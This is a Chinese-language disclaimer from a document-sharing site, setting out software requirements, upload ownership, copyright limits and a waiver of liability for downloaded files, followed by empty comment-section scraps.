  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論